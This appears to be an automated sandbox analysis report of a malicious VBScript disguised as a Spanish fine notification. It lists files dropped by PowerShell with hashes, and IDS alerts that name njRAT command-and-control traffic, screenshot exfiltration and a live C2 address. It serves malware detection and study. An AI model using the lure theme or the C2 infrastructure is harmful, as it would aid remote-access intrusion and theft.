SHA-512:	EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF6da1db.TMP (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.711704485190179
Encrypted:	false
SSDEEP:	48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
MD5:	C33E4787669FDEB082B64C7A521F18B7
SHA1:	2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
SHA-256:	A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
SHA-512:	EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF6dc188.TMP (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.711704485190179
Encrypted:	false
SSDEEP:	48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
MD5:	C33E4787669FDEB082B64C7A521F18B7
SHA1:	2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
SHA-256:	A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
SHA-512:	EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVMAZEKE6YQ4XTFMMU7S.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.716133014091462
Encrypted:	false
SSDEEP:	48:lu965LCmbU23+LaukvhkvklCyw6n2kCXosElIISogZoBECXosElIISogZoV1:G8LCTdvkvhkvCCt2CXosECHRCXosECHi
MD5:	0EA11BA3C830DC9D0E6E8C23BF853CDB
SHA1:	5712CCB29FAF7C5019548A987FDD39A073A85C9D
SHA-256:	FA554F930E8D4D1EA76092BD20C687D3735B68315696581018B7507AFBEE2CD4
SHA-512:	FB58CE8B00A15D81CAC8433F3E770B682EA42931C28B404B7472009C0131EAD6DEF4C1B59664F18DF77F99B5CDCBE9DAB8C9AD52B3BE5E2337B5C59F5D972B3E
Malicious:	false
Preview:	...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......!.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl8YG.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl8YL.....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P32ZI24FW5IL27D26J50.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.711704485190179
Encrypted:	false
SSDEEP:	48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
MD5:	C33E4787669FDEB082B64C7A521F18B7
SHA1:	2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
SHA-256:	A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
SHA-512:	EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UHT44YAMZRAENXN1K5VR.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7142966727309394
Encrypted:	false
SSDEEP:	48:lua65LCmbU23+LaukvhkvklCyw6n2kCXosElIISogZoBECXosElIISogZoV1:J8LCTdvkvhkvCCt2CXosECHRCXosECHi
MD5:	2DB96E8084555BC025C18E4FA300E9FC
SHA1:	551F2F89473CE044505896433ABA8A42EBAD05CE
SHA-256:	2298FDD413126E4F42520FCC495F64A969F0AA8A971C17445B1844E0750D3E12
SHA-512:	812AB7279838ACF50158BA5CAAFBECAAAADADD47896020E18ADD60D22ACD380F2022A2F7F975AA4AE017E0DAAB948E2DCEB6225FCA398E09FB16DDF10D20AD77
Malicious:	false
Preview:	...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......n..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl8YG.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl8YL.....q...........

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.5560413891125555
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	Oficio notificacion multas y sanciones.vbs
File size:	576'314 bytes
MD5:	5d0e059a9d852fbaa853170862b948f7
SHA1:	89c0faf4ba6531b3e9c5550f53280e02492c770d
SHA256:	838e276f65a1dcdf9fd0292c3c7cd8b6c3f6c2ed940adcc663d68dd84a40e2c4
SHA512:	9ed84239c4277d19e8ea127282cd06d941293278f90bc25a98ddda2281dce8ce17295617e55216af925db77c78457c4ea10a8f9d24e9ecdfc94aa710f40df7a4
SSDEEP:	1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFB:4HY
TLSH:	09C4BD4667EB5509B1B72F586D7A50740BA33E5A99BCC69C01CCA81E0FF3A40C865BF3
File Content Preview:	..........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .m.e.x.i.c.a.n.o. .'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .........'. .P.r.i.n.t. .u.s.a.g.e. .b.a.S.T.o.....'.............'. .I.n.s.t.a.l.l. .P.r.o.v.i.d.e.r.s.................'. .U.n.i.n.s.t.a

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-24T23:42:10.278503+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49708	76.76.21.22	443	TCP
2024-09-24T23:42:13.919461+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49711	76.76.21.22	443	TCP
2024-09-24T23:42:24.538051+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:42:24.543018+0200	2825563	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:42:30.780426+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:09.823180+0200	2825565	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:13.222752+0200	2825565	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:16.816363+0200	2825566	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:20.048232+0200	2825565	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:20.415585+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:21.823270+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:22.955511+0200	2825565	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:26.275661+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:26.448004+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.447593+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.572536+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.874346+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.879287+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.884284+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.890574+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.895424+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.900265+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.905133+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.909984+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.917729+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.922522+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.938041+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.006779+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.078828+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.083729+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.089272+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.094773+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.102648+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.107699+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.112675+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.118220+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.125430+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.130615+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.135572+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.141947+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.146951+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.151855+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.156685+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.162693+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.167715+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.189826+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.194891+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.199734+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.204631+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.209478+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.215309+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.220171+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.225084+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.232142+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.237093+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.242013+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.246929+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.251785+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.260716+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.265623+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.270502+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.281059+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.320454+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.325448+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.330529+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.336799+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.344731+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.350336+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.356134+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.362179+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.368022+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.393404+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.399029+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.404239+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.410456+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.415443+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.420374+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.426867+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.431776+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.436637+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.443695+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.448627+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.453477+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.458417+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.463317+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.468119+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.473049+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.477902+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.482840+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.487734+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.493974+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.498863+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.503742+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.510071+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.517350+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.522195+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.528027+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
